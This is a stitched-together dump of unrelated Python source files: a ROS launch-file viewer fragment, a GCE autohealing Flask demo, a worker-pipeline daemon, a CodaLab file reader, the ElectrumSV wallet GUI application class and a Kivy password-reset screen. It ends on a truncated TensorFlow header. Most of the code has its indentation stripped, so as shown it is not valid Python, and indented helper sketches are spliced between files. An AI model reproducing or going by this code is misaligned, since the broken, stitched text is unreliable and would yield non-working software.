elif isinstance(data, LaunchtreeRosparam):
self.properties_content.setCurrentIndex(3)
path_segments = self.launch_view.currentItem().text(0).split(self._launch_separator)
if len(path_segments) == 2:
(p, l) = path_segments
(d, f) = os.path.split(l)
else:
p = None
f = path_segments[0]
self.file_package.setText(p if p is not None else '')
self.file_package.setEnabled(p is not None)
self.file_name.setText(f)
elif isinstance(data, dict):
self.properties_content.setCurrentIndex(3)
(p, l) = self.launch_view.currentItem().text(0).split(self._launch_separator)
(d, f) = os.path.split(l)
self.file_package.setText(p)
self.file_name.setText(f)
else:
self.properties_content.setCurrentIndex(0)
def _filter_launch_view(self, collapse=False):
show_nodes = self.filter_nodes.isChecked()
show_params = self.filter_params.isChecked()
show_args = self.filter_args.isChecked()
show_remaps = self.filter_remaps.isChecked()
show_empty = self.filter_empty.isChecked()
search_text = self.search_input.text()
highlight = search_text != ''
expand = not collapse and highlight
def filter_launch_entry(entry):
show = False
# param
if isinstance(entry.instance, roslaunch.core.Param):
show = show_params
# node
elif isinstance(entry.instance, roslaunch.core.Node):
show = show_nodes
# machine (no separate option to display machines, is coupled to nodes)
elif isinstance(entry.instance, roslaunch.core.Machine):
show = show_nodes
# arg
elif isinstance(entry.instance, LaunchtreeArg):
show = show_args
# remap
elif isinstance(entry.instance, LaunchtreeRemap):
show = show_remaps
show &= search_text in entry.text(0)
if show:
# color = self._highlight_color if highlight else self._neutral_color
# entry.setStyleSheet("background-color:%s" % color)
entry.setBackground(0, self._highlight_color if highlight else self._neutral_color)
if entry.childCount() > 0:
not_empty = any(map(filter_launch_entry, map(entry.child, range(entry.childCount()))))
show |= show_empty or not_empty
entry.setExpanded(not collapse and (expand or entry.isExpanded()))
entry.setHidden(not show)
return show
for idx in range(self.launch_view.topLevelItemCount()):
filter_launch_entry(self.launch_view.topLevelItem(idx))
def _launch_open_clicked(self):
(p, l) = self.launch_view.currentItem().text(0).split(self._launch_separator)
filename = os.path.join(self._rp.get_path(p), l)
thread = threading.Thread(target=os.system, args=['%s %s' % (self.editor, filename)])
thread.daemon = True
thread.start()
def _root_open_clicked(self):
filename = os.path.join(
self._rp.get_path(self.package_select.currentText()),
self.launchfile_select.currentText()
)
thread = threading.Thread(target=os.system, args=['%s %s' % (self.editor, filename)])
thread.daemon = True
thread.start()
def shutdown(self):
pass
def _filename_to_label(self, filename):
tail = list()
for d in reversed(filename.split('/')):
if d in self._rp_package_list:
return '%s%s%s' % (d, self._launch_separator, '/'.join(reversed(tail)))
else:
tail.append(d)
return filename
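# A minimal standalone sketch of the launch-file discovery implemented by
# _get_launch_files() above (illustrative only; it unrolls the nested Python 2
# itertools pipeline into a plain generator expression and reuses the `os`
# module already imported at the top of this file):
def _get_launch_files_sketch(path):
    return sorted(
        os.path.join(root, name).replace(path + '/', '')
        for root, _dirs, files in os.walk(path)
        for name in files
        if os.path.splitext(name)[1] == '.launch'
    )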
|
app.py
|
# Copyright 2019, Google, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Flask app to be used as an interactive demonstration of autohealing.
Exposes a simple UI showing basic server stats and a toggle button to
simulate a healthy/unhealthy server status for any attached health check.
Attached health checks should query the '/health' path.
"""
from ctypes import c_bool
from multiprocessing import Process, Value
from random import random
from re import sub
from socket import gethostname
from time import sleep
from flask import Flask, make_response, render_template
from requests import get
PORT_NUMBER = 80
app = Flask(__name__)
_is_healthy = True
_cpu_burner = None
@app.before_first_request
def init():
global _cpu_burner
_cpu_burner = CpuBurner()
@app.route('/')
def index():
"""Returns the demo UI."""
global _cpu_burner, _is_healthy
return render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=_cpu_burner.is_running())
@app.route('/health')
def health():
"""Returns the simulated 'healthy'/'unhealthy' status of the server.
Returns:
HTTP status 200 if 'healthy', HTTP status 500 if 'unhealthy'
"""
global _is_healthy
template = render_template('health.html', healthy=_is_healthy)
return make_response(template, 200 if _is_healthy else 500)
@app.route('/makeHealthy')
def make_healthy():
"""Sets the server to simulate a 'healthy' status."""
global _cpu_burner, _is_healthy
_is_healthy = True
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=True,
working=_cpu_burner.is_running())
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/makeUnhealthy')
def make_unhealthy():
"""Sets the server to simulate an 'unhealthy' status."""
global _cpu_burner, _is_healthy
_is_healthy = False
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=False,
working=_cpu_burner.is_running())
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/startLoad')
def start_load():
"""Sets the server to simulate high CPU load."""
global _cpu_burner, _is_healthy
_cpu_burner.start()
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=True)
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
@app.route('/stopLoad')
def stop_load():
"""Sets the server to stop simulating CPU load."""
global _cpu_burner, _is_healthy
_cpu_burner.stop()
template = render_template('index.html',
hostname=gethostname(),
zone=_get_zone(),
template=_get_template(),
healthy=_is_healthy,
working=False)
response = make_response(template, 302)
response.headers['Location'] = '/'
return response
def _get_zone():
"""Gets the GCE zone of this instance.
Returns:
str: The name of the zone if the zone was successfully determined.
Empty string otherwise.
"""
r = get('http://metadata.google.internal/'
'computeMetadata/v1/instance/zone',
headers={'Metadata-Flavor': 'Google'})
if r.status_code == 200:
return sub(r'.+zones/(.+)', r'\1', r.text)
else:
return ''
def _get_template():
"""Gets the GCE instance template of this instance.
Returns:
str: The name of the template if the template was successfully
determined and this instance was built using an instance template.
Empty string otherwise.
"""
r = get('http://metadata.google.internal/'
'computeMetadata/v1/instance/attributes/instance-template',
headers={'Metadata-Flavor': 'Google'})
if r.status_code == 200:
return sub(r'.+instanceTemplates/(.+)', r'\1', r.text)
else:
return ''
class CpuBurner:
"""
Object to asynchronously burn CPU cycles to simulate high CPU load.
Burns CPU in a separate process and can be toggled on and off.
"""
def __init__(self):
self._toggle = Value(c_bool, False, lock=True)
self._process = Process(target=self._burn_cpu)
self._process.start()
def start(self):
"""Start burning CPU."""
self._toggle.value = True
def stop(self):
"""Stop burning CPU."""
self._toggle.value = False
def is_running(self):
"""Returns true if currently burning CPU."""
return self._toggle.value
def _burn_cpu(self):
"""Burn CPU cycles if work is toggled, otherwise sleep."""
while True:
random()*random() if self._toggle.value else sleep(1)
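def _probe_health(base_url='http://localhost:%d' % PORT_NUMBER):
    """Minimal sketch of an external health probe (illustrative only; the URL is
    an assumption -- a real GCE health check targets the instance address, not
    localhost). Returns True for the simulated 'healthy' state (HTTP 200) and
    False for 'unhealthy' (HTTP 500)."""
    return get('%s/health' % base_url).status_code == 200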
if __name__ == "__main__":
app.run(debug=False, port=PORT_NUMBER)
|
piper.py
|
from multiprocessing import Process
from inputs import load_input
from handles import load_handle
from outputs import load_output
from worker import Worker
from config import config
import time
def _create_worker_process(input_, handle, output, interval=.2):
worker = Worker(input_, handle, output, interval)
return Process(target=worker.start, daemon=True)
def _start_piper(*worker_confs):
worker_pool = [
_create_worker_process(
load_input(conf['input']['name'], **conf['input'].get('kwargs', {})),
load_handle(conf['handle']['name'], **conf['handle'].get('kwargs', {})),
load_output(conf['output']['name'], **conf['output'].get('kwargs', {})))
for conf in worker_confs
]
for w in worker_pool:
w.start()
return worker_pool
def main():
"""
Start pipeline worker daemon
"""
worker_confs = config.get('workers', [])
assert worker_confs, 'Worker config not found'
is_alive = False
worker_pool = []
while True:
if not is_alive:
for p in worker_pool:
p.terminate()
worker_pool = _start_piper(*worker_confs)
is_alive = True
for p in worker_pool:
if not p.is_alive():
is_alive = False
break
time.sleep(.1)
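# A minimal sketch of the 'workers' configuration consumed by _start_piper()
# (illustrative only; the plugin names and kwargs below are assumptions and must
# match whatever load_input/load_handle/load_output can actually resolve):
_EXAMPLE_WORKER_CONFS = [
    {
        'input': {'name': 'example_input', 'kwargs': {'path': '/tmp/in'}},
        'handle': {'name': 'example_handle'},
        'output': {'name': 'example_output', 'kwargs': {'path': '/tmp/out'}},
    },
]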
if __name__ == '__main__':
main()
|
local_reader.py
|
from contextlib import closing
import httplib
import os
import threading
from codalabworker.run_manager import Reader
import codalabworker.download_util as download_util
from codalabworker.download_util import get_target_path, PathException
from codalabworker.file_util import (
gzip_file,
gzip_string,
read_file_section,
summarize_file,
tar_gzip_directory,
)
class LocalReader(Reader):
"""
Class that implements read functions for bundles executed on the local filesystem
"""
def __init__(self):
super(LocalReader, self).__init__()
self.read_threads = [] # Threads
def stop(self):
for thread in self.read_threads:
thread.join()
def _threaded_read(self, run_state, path, stream_fn, reply_fn):
"""
Given a run state, a path, a stream function and a reply function,
- Computes the real filesystem path to the path in the bundle
- In case of error, invokes reply_fn with an http error
- Otherwise starts a thread calling stream_fn on the computed final path
"""
try:
final_path = get_target_path(run_state.bundle_path, run_state.bundle['uuid'], path)
except PathException as e:
reply_fn((httplib.NOT_FOUND, e.message), None, None)
read_thread = threading.Thread(target=stream_fn, args=[final_path])
read_thread.start()
self.read_threads.append(read_thread)
def get_target_info(self, run_state, path, dep_paths, args, reply_fn):
"""
Return target_info of path in bundle as a message on the reply_fn
"""
bundle_uuid = run_state.bundle['uuid']
target_info = None
        # if path is a dependency, reply with an error
if path and os.path.normpath(path) in dep_paths:
err = (httplib.NOT_FOUND, '{} not found in bundle {}'.format(path, bundle_uuid))
reply_fn(err, None, None)
return
else:
try:
target_info = download_util.get_target_info(
run_state.bundle_path, bundle_uuid, path, args['depth']
)
except PathException as e:
err = (httplib.NOT_FOUND, e.message)
reply_fn(err, None, None)
return
if not path and args['depth'] > 0:
target_info['contents'] = [
child for child in target_info['contents'] if child['name'] not in dep_paths
]
reply_fn(None, {'target_info': target_info}, None)
def stream_directory(self, run_state, path, dep_paths, args, reply_fn):
"""
Stream the directory at path using a separate thread
"""
exclude_names = [] if path else dep_paths
def stream_thread(final_path):
with closing(tar_gzip_directory(final_path, exclude_names=exclude_names)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_thread, reply_fn)
def stream_file(self, run_state, path, dep_paths, args, reply_fn):
"""
Stream the file at path using a separate thread
"""
def stream_file(final_path):
with closing(gzip_file(final_path)) as fileobj:
reply_fn(None, {}, fileobj)
self._threaded_read(run_state, path, stream_file, reply_fn)
def read_file_section(self, run_state, path, dep_paths, args, reply_fn):
"""
Read the section of file at path of length args['length'] starting at
args['offset'] using a separate thread
"""
def read_file_section_thread(final_path):
string = gzip_string(read_file_section(final_path, args['offset'], args['length']))
reply_fn(None, {}, string)
self._threaded_read(run_state, path, read_file_section_thread, reply_fn)
def summarize_file(self, run_state, path, dep_paths, args, reply_fn):
"""
Summarize the file including args['num_head_lines'] and
        args['num_tail_lines'], limited to args['max_line_length'], using
args['truncation_text'] on a separate thread
"""
def summarize_file_thread(final_path):
string = gzip_string(
summarize_file(
final_path,
args['num_head_lines'],
args['num_tail_lines'],
args['max_line_length'],
args['truncation_text'],
)
)
reply_fn(None, {}, string)
self._threaded_read(run_state, path, summarize_file_thread, reply_fn)
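def _example_reply_fn(err, message, data):
    """Minimal sketch of the reply_fn contract used by LocalReader above
    (illustrative only; the real callback is supplied by the worker's RPC layer).
    err is None on success or an (http_status, error_string) tuple, message is a
    JSON-serializable dict such as {'target_info': ...}, and data is an optional
    file-like object or gzipped string payload."""
    if err is not None:
        status, msg = err
        print('error %s: %s' % (status, msg))
    else:
        print('reply: %s (stream attached: %s)' % (message, data is not None))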
|
app.py
|
# ElectrumSV - lightweight Bitcoin client
# Copyright (C) 2019-2020 The ElectrumSV Developers
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
'''ElectrumSV application.'''
import concurrent
import datetime
import os
from functools import partial
import signal
import sys
import threading
from typing import Callable, Optional
from aiorpcx import run_in_thread
import PyQt5.QtCore as QtCore
from PyQt5.QtCore import pyqtSignal, QObject, QTimer
from PyQt5.QtGui import QGuiApplication
from PyQt5.QtWidgets import QApplication, QSystemTrayIcon, QMenu, QWidget, QDialog
from electrumsv.app_state import app_state
from electrumsv.contacts import ContactEntry, ContactIdentity
from electrumsv.i18n import _, set_language
from electrumsv.logs import logs
from electrumsv.wallet import AbstractAccount, Wallet
from electrumsv.wallet_database.tables import WalletEventRow
from . import dialogs
from .cosigner_pool import CosignerPool
from .main_window import ElectrumWindow
from .exception_window import Exception_Hook
from .label_sync import LabelSync
from .log_window import SVLogWindow, SVLogHandler
from .util import ColorScheme, get_default_language, MessageBox, read_QIcon
from .wallet_wizard import WalletWizard
logger = logs.get_logger('app')
class OpenFileEventFilter(QObject):
def __init__(self, windows):
super().__init__()
self.windows = windows
def eventFilter(self, obj, event):
if event.type() == QtCore.QEvent.FileOpen:
if len(self.windows) >= 1:
self.windows[0].pay_to_URI(event.url().toString())
return True
return False
class SVApplication(QApplication):
# Signals need to be on a QObject
create_new_window_signal = pyqtSignal(str, object)
cosigner_received_signal = pyqtSignal(object, object)
labels_changed_signal = pyqtSignal(object, object, object)
window_opened_signal = pyqtSignal(object)
window_closed_signal = pyqtSignal(object)
# Async tasks
async_tasks_done = pyqtSignal()
# Logging
new_category = pyqtSignal(str)
new_log = pyqtSignal(object)
# Preferences updates
fiat_ccy_changed = pyqtSignal()
custom_fee_changed = pyqtSignal()
op_return_enabled_changed = pyqtSignal()
num_zeros_changed = pyqtSignal()
base_unit_changed = pyqtSignal()
fiat_history_changed = pyqtSignal()
fiat_balance_changed = pyqtSignal()
update_check_signal = pyqtSignal(bool, object)
# Contact events
contact_added_signal = pyqtSignal(object, object)
contact_removed_signal = pyqtSignal(object)
identity_added_signal = pyqtSignal(object, object)
identity_removed_signal = pyqtSignal(object, object)
new_notification = pyqtSignal(object, object)
def __init__(self, argv):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_X11InitThreads)
if hasattr(QtCore.Qt, "AA_ShareOpenGLContexts"):
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_ShareOpenGLContexts)
if hasattr(QGuiApplication, 'setDesktopFileName'):
QGuiApplication.setDesktopFileName('electrum-sv.desktop')
super().__init__(argv)
self.windows = []
self.log_handler = SVLogHandler()
self.log_window = None
self.net_dialog = None
self.timer = QTimer()
self.exception_hook = None
# A floating point number, e.g. 129.1
self.dpi = self.primaryScreen().physicalDotsPerInch()
# init tray
self.dark_icon = app_state.config.get("dark_icon", False)
self.tray = QSystemTrayIcon(self._tray_icon(), None)
self.tray.setToolTip('ElectrumSV')
self.tray.activated.connect(self._tray_activated)
self._build_tray_menu()
self.tray.show()
# FIXME Fix what.. what needs to be fixed here?
set_language(app_state.config.get('language', get_default_language()))
logs.add_handler(self.log_handler)
self._start()
def _start(self):
self.setWindowIcon(read_QIcon("electrum-sv.png"))
self.installEventFilter(OpenFileEventFilter(self.windows))
self.create_new_window_signal.connect(self.start_new_window)
self.async_tasks_done.connect(app_state.async_.run_pending_callbacks)
self.num_zeros_changed.connect(partial(self._signal_all, 'on_num_zeros_changed'))
self.fiat_ccy_changed.connect(partial(self._signal_all, 'on_fiat_ccy_changed'))
self.base_unit_changed.connect(partial(self._signal_all, 'on_base_unit_changed'))
self.fiat_history_changed.connect(partial(self._signal_all, 'on_fiat_history_changed'))
# Toggling of showing addresses in the fiat preferences.
self.fiat_balance_changed.connect(partial(self._signal_all, 'on_fiat_balance_changed'))
self.update_check_signal.connect(partial(self._signal_all, 'on_update_check'))
ColorScheme.update_from_widget(QWidget())
def _signal_all(self, method, *args):
for window in self.windows:
getattr(window, method)(*args)
def _close(self):
for window in self.windows:
window.close()
def close_window(self, window) -> None:
# NOTE: `ElectrumWindow` removes references to itself while it is closing. This creates
        # a problem where it gets garbage collected before its Qt5 `closeEvent` handling is
# completed and on Linux/MacOS it segmentation faults. On Windows, it is fine.
QTimer.singleShot(0, partial(self._close_window, window))
logger.debug("app.close_window.queued")
def _close_window(self, window):
logger.debug(f"app.close_window.executing {window!r}")
app_state.daemon.stop_wallet_at_path(window._wallet.get_storage_path())
self.windows.remove(window)
self.window_closed_signal.emit(window)
self._build_tray_menu()
if not self.windows:
self._last_window_closed()
def setup_app(self):
# app_state.daemon is initialised after app. Setup things dependent on daemon here.
pass
def _build_tray_menu(self):
# Avoid immediate GC of old menu when window closed via its action
if self.tray.contextMenu() is None:
m = QMenu()
self.tray.setContextMenu(m)
else:
m = self.tray.contextMenu()
m.clear()
for window in self.windows:
submenu = m.addMenu(window._wallet.name())
submenu.addAction(_("Show/Hide"), window.show_or_hide)
submenu.addAction(_("Close"), window.close)
m.addAction(_("Dark/Light"), self._toggle_tray_icon)
m.addSeparator()
m.addAction(_("Exit ElectrumSV"), self._close)
self.tray.setContextMenu(m)
def _tray_icon(self):
if self.dark_icon:
return read_QIcon('electrumsv_dark_icon.png')
else:
return read_QIcon('electrumsv_light_icon.png')
def _toggle_tray_icon(self) -> None:
self.dark_icon = not self.dark_icon
app_state.config.set_key("dark_icon", self.dark_icon, True)
self.tray.setIcon(self._tray_icon())
def _tray_activated(self, reason) -> None:
if reason == QSystemTrayIcon.DoubleClick:
if all([w.is_hidden() for w in self.windows]):
for w in self.windows:
w.bring_to_top()
else:
for w in self.windows:
w.hide()
def new_window(self, path: Optional[str], uri: Optional[str]=None) -> None:
# Use a signal as can be called from daemon thread
self.create_new_window_signal.emit(path, uri)
def show_network_dialog(self, parent) -> None:
if not app_state.daemon.network:
parent.show_warning(_('You are using ElectrumSV in offline mode; restart '
'ElectrumSV if you want to get connected'), title=_('Offline'))
return
if self.net_dialog:
self.net_dialog.on_update()
self.net_dialog.show()
self.net_dialog.raise_()
return
from . import network_dialog
# from importlib import reload
# reload(network_dialog)
self.net_dialog = network_dialog.NetworkDialog(app_state.daemon.network, app_state.config)
self.net_dialog.show()
def show_log_viewer(self) -> None:
if self.log_window is None:
self.log_window = SVLogWindow(None, self.log_handler)
self.log_window.show()
def _last_window_closed(self) -> None:
for dialog in (self.net_dialog, self.log_window):
if dialog:
dialog.accept()
def on_transaction_label_change(self, wallet: Wallet, tx_hash: bytes, text: str) -> None:
self.label_sync.set_transaction_label(wallet, tx_hash, text)
def on_keyinstance_label_change(self, account: AbstractAccount, key_id: int, text: str) -> None:
self.label_sync.set_keyinstance_label(account, key_id, text)
def _create_window_for_wallet(self, wallet: Wallet) -> ElectrumWindow:
w = ElectrumWindow(wallet)
self.windows.append(w)
self._build_tray_menu()
self._register_wallet_events(wallet)
self.window_opened_signal.emit(w)
return w
def _register_wallet_events(self, wallet: Wallet) -> None:
wallet.contacts._on_contact_added = self._on_contact_added
wallet.contacts._on_contact_removed = self._on_contact_removed
wallet.contacts._on_identity_added = self._on_identity_added
wallet.contacts._on_identity_removed = self._on_identity_removed
def _on_identity_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_added_signal.emit(contact, identity)
def _on_identity_removed(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.identity_removed_signal.emit(contact, identity)
def _on_contact_added(self, contact: ContactEntry, identity: ContactIdentity) -> None:
self.contact_added_signal.emit(contact, identity)
def _on_contact_removed(self, contact: ContactEntry) -> None:
self.contact_removed_signal.emit(contact)
def on_new_wallet_event(self, wallet_path: str, row: WalletEventRow) -> None:
self.new_notification.emit(wallet_path, row)
def get_wallet_window(self, path: str) -> Optional[ElectrumWindow]:
for w in self.windows:
if w._wallet.get_storage_path() == path:
return w
def get_wallet_window_by_id(self, account_id: int) -> Optional[ElectrumWindow]:
for w in self.windows:
for account in w._wallet.get_accounts():
if account.get_id() == account_id:
return w
def start_new_window(self, wallet_path: Optional[str], uri: Optional[str]=None,
is_startup: bool=False) -> Optional[ElectrumWindow]:
'''Raises the window for the wallet if it is open. Otherwise
opens the wallet and creates a new window for it.'''
for w in self.windows:
if w._wallet.get_storage_path() == wallet_path:
w.bring_to_top()
break
else:
wizard_window: Optional[WalletWizard] = None
if wallet_path is not None:
is_valid, was_aborted, wizard_window = WalletWizard.attempt_open(wallet_path)
if was_aborted:
return None
if not is_valid:
wallet_filename = os.path.basename(wallet_path)
MessageBox.show_error(
_("Unable to load file '{}'.").format(wallet_filename))
return None
else:
wizard_window = WalletWizard(is_startup=is_startup)
if wizard_window is not None:
result = wizard_window.run()
if result != QDialog.Accepted:
return None
wallet_path = wizard_window.get_wallet_path()
# We cannot rely on accept alone indicating success.
if wallet_path is None:
return None
wallet = app_state.daemon.load_wallet(wallet_path)
assert wallet is not None
w = self._create_window_for_wallet(wallet)
if uri:
w.pay_to_URI(uri)
w.bring_to_top()
w.setWindowState(w.windowState() & ~QtCore.Qt.WindowMinimized | QtCore.Qt.WindowActive)
# this will activate the window
w.activateWindow()
return w
def update_check(self) -> None:
if (not app_state.config.get('check_updates', True) or
app_state.config.get("offline", False)):
return
def f():
import requests
try:
response = requests.request(
'GET', "https://electrumsv.io/release.json",
headers={'User-Agent' : 'ElectrumSV'}, timeout=10)
result = response.json()
self._on_update_check(True, result)
except Exception:
self._on_update_check(False, sys.exc_info())
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _on_update_check(self, success: bool, result: dict) -> None:
if success:
when_checked = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('last_update_check', result)
app_state.config.set_key('last_update_check_time', when_checked, True)
self.update_check_signal.emit(success, result)
def initial_dialogs(self) -> None:
'''Suppressible dialogs that are shown when first opening the app.'''
dialogs.show_named('welcome-ESV-1.3.7')
def event_loop_started(self) -> None:
self.cosigner_pool = CosignerPool()
self.label_sync = LabelSync()
if app_state.config.get("show_crash_reporter", default=True):
self.exception_hook = Exception_Hook(self)
self.timer.start()
signal.signal(signal.SIGINT, lambda *args: self.quit())
self.initial_dialogs()
path = app_state.config.get_cmdline_wallet_filepath()
if not self.start_new_window(path, app_state.config.get('url'), is_startup=True):
self.quit()
def run_app(self) -> None:
when_started = datetime.datetime.now().astimezone().isoformat()
app_state.config.set_key('previous_start_time', app_state.config.get("start_time"))
app_state.config.set_key('start_time', when_started, True)
self.update_check()
threading.current_thread().setName('GUI')
self.timer.setSingleShot(False)
self.timer.setInterval(500) # msec
self.timer.timeout.connect(app_state.device_manager.timeout_clients)
QTimer.singleShot(0, self.event_loop_started)
self.exec_()
logs.remove_handler(self.log_handler)
# Shut down the timer cleanly
self.timer.stop()
# clipboard persistence
# see http://www.mail-archive.com/pyqt@riverbankcomputing.com/msg17328.html
event = QtCore.QEvent(QtCore.QEvent.Clipboard)
self.sendEvent(self.clipboard(), event)
self.tray.hide()
def run_coro(self, coro, *args, on_done=None):
        '''Run a coroutine. on_done, if given, is passed the future containing the result or
exception, and is guaranteed to be called in the context of the GUI thread.
'''
def task_done(future):
self.async_tasks_done.emit()
future = app_state.async_.spawn(coro, *args, on_done=on_done)
future.add_done_callback(task_done)
return future
def run_in_thread(self, func, *args,
on_done: Optional[Callable[[concurrent.futures.Future], None]]=None):
'''Run func(*args) in a thread. on_done, if given, is passed the future containing the
        result or exception, and is guaranteed to be called in the context of the GUI
thread.
'''
return self.run_coro(run_in_thread, func, *args, on_done=on_done)
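def _example_run_in_thread_usage(app):
    '''Minimal usage sketch for run_in_thread() (illustrative only; this helper
    is not part of ElectrumSV's API). on_done receives the
    concurrent.futures.Future and runs in the context of the GUI thread.'''
    def _slow_work(x):
        return x * 2
    def _done(future):
        logger.debug("background result: %s", future.result())
    app.run_in_thread(_slow_work, 21, on_done=_done)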
|
appReset.py
|
"""
appReset
========
`appReset` is a toolbox for the main app; it contains the methods that the AppReset page requires.
"""
import threading
from functools import partial
from kivy.clock import mainthread
from kivy.uix.button import Button
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.image import Image
from kivy.uix.popup import Popup
from kivy.uix.textinput import TextInput
from func import image_button, text_button, database_api
from func.garden.progressspinner import ProgressSpinner
__author__ = "Muhammed Yasin Yildirim"
def on_pre_enter(self):
"""
This method adds image button to quit and text button to go back.
:param self: It is for handling class structure.
:return:
"""
self.ids["layout_menubar"].add_widget(image_button.add_button("data/img/ico_quit.png",
"data/img/ico_quit_select.png",
.075,
{"x": .925, "y": 0},
self.on_quit
)
)
self.add_widget(text_button.add_button("< Back",
"data/font/CaviarDreams.ttf",
(.3, .025),
{"center_x": .5, "y": .175},
self.on_back
)
)
def on_reset(s):
"""
    This method creates a thread to handle the reset process in the background.
:param s: It is for handling class structure.
:return:
"""
def on_reset_confirm(self, dt):
"""
        This method asks the user to provide the key sent to his or her e-mail for resetting the password.
:param self: It is for handling class structure.
:param dt: It is for handling callback input.
:return:
"""
self.ico_status_confirm.opacity = 0
if not (self.input_key.text.strip() or self.input_new_password.text.strip()):
self.ico_status_confirm.opacity = 1
else:
is_ok = database_api.resetPassword(self.ids["input_username"].text,
self.input_key.text,
self.input_new_password.text
)
if not isinstance(is_ok, str):
self.popup.dismiss()
self.on_back()
else:
self.ico_status_confirm.opacity = 1
@mainthread
def authorize(self=s):
"""
        This method checks whether the user credentials are valid on the server and creates the confirmation pop-up accordingly.
:return: It is for terminating thread.
"""
btn_reset = self.ids["btn_reset"]
btn_reset.disabled = True
ico_status = self.ids["ico_status"]
ico_spinner = ProgressSpinner(size_hint=(.05, .05),
pos_hint={"center_x": .65, "center_y": .8}
)
self.add_widget(ico_spinner)
input_username = self.ids["input_username"].text
# input_email = self.ids["input_email"].text
if not input_username.strip(): # or input_email.strip()
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_warning.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
else:
try:
data = database_api.resetPassword(self.ids["input_username"].text)
except:
data = None
if data is not None:
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_success.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
popup_content = FloatLayout()
self.popup = Popup(title="Reset Password",
content=popup_content,
separator_color=[140 / 255., 55 / 255., 95 / 255., 1.],
size_hint=(None, None),
size=(self.width / 3, self.height / 3)
)
self.input_key = TextInput(hint_text="Confirmation Key",
write_tab=False,
multiline=False,
font_name="data/font/CaviarDreams_Bold.ttf",
font_size=self.height / 36,
background_normal="data/img/widget_gray_75.png",
background_active="data/img/widget_purple_75_select.png",
background_disabled_normal="data/img/widget_black_75.png",
padding_y=[self.height / 36, 0],
size_hint=(.9, .3),
pos_hint={"center_x": .5, "center_y": .8}
)
popup_content.add_widget(self.input_key)
self.input_new_password = TextInput(hint_text="New Password",
write_tab=False,
multiline=False,
password=True,
font_name="data/font/CaviarDreams_Bold.ttf",
font_size=self.height / 36,
background_normal="data/img/widget_gray_75.png",
background_active="data/img/widget_purple_75_select.png",
background_disabled_normal="data/img/widget_black_75.png",
padding_y=[self.height / 36, 0],
size_hint=(.9, .3),
pos_hint={"center_x": .5, "center_y": .4}
)
popup_content.add_widget(self.input_new_password)
self.ico_status_confirm = Image(source="data/img/ico_status_warning.png",
allow_stretch=True,
opacity=0,
size_hint=(.15, .15),
pos_hint={"center_x": .9, "center_y": .8}
)
popup_content.add_widget(self.ico_status_confirm)
popup_content.add_widget(Button(text="Submit",
font_name="data/font/LibelSuit.ttf",
font_size=self.height / 40,
background_normal="data/img/widget_green.png",
background_down="data/img/widget_green_select.png",
size_hint_x=.5,
size_hint_y=None,
height=self.height / 20,
pos_hint={"center_x": .25, "y": .0},
on_release=partial(on_reset_confirm,
s
)
)
)
popup_content.add_widget(Button(text="Cancel",
font_name="data/font/LibelSuit.ttf",
font_size=self.height / 40,
background_normal="data/img/widget_red.png",
background_down="data/img/widget_red_select.png",
size_hint_x=.5,
size_hint_y=None,
height=self.height / 20,
pos_hint={"center_x": .75, "y": .0},
on_release=self.popup.dismiss)
)
self.popup.open()
else:
self.remove_widget(ico_spinner)
ico_status.source = "data/img/ico_status_fail.png"
ico_status.opacity = 1
ico_status.reload()
btn_reset.disabled = False
return
authorization = threading.Thread(target=authorize)
authorization.daemon = True
authorization.start()
def on_back(pages, screen):
"""
    This method switches the current screen to the specified one.
:param pages: It is list of pages.
:param screen: It is screen manager.
:return:
"""
try:
screen.switch_to(pages[2])
except:
screen.current = pages[2].name
finally:
del pages[1]
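def bind_back_button(button, pages, screen):
    """
    This is a minimal wiring sketch (illustrative only; the real binding is done
    by the main app and its .kv files, and `button` is an assumed Kivy Button).
    :param button: It is the button to bind.
    :param pages: It is list of pages.
    :param screen: It is screen manager.
    :return:
    """
    button.bind(on_release=lambda *args: on_back(pages, screen))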
|
async_checkpoint.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
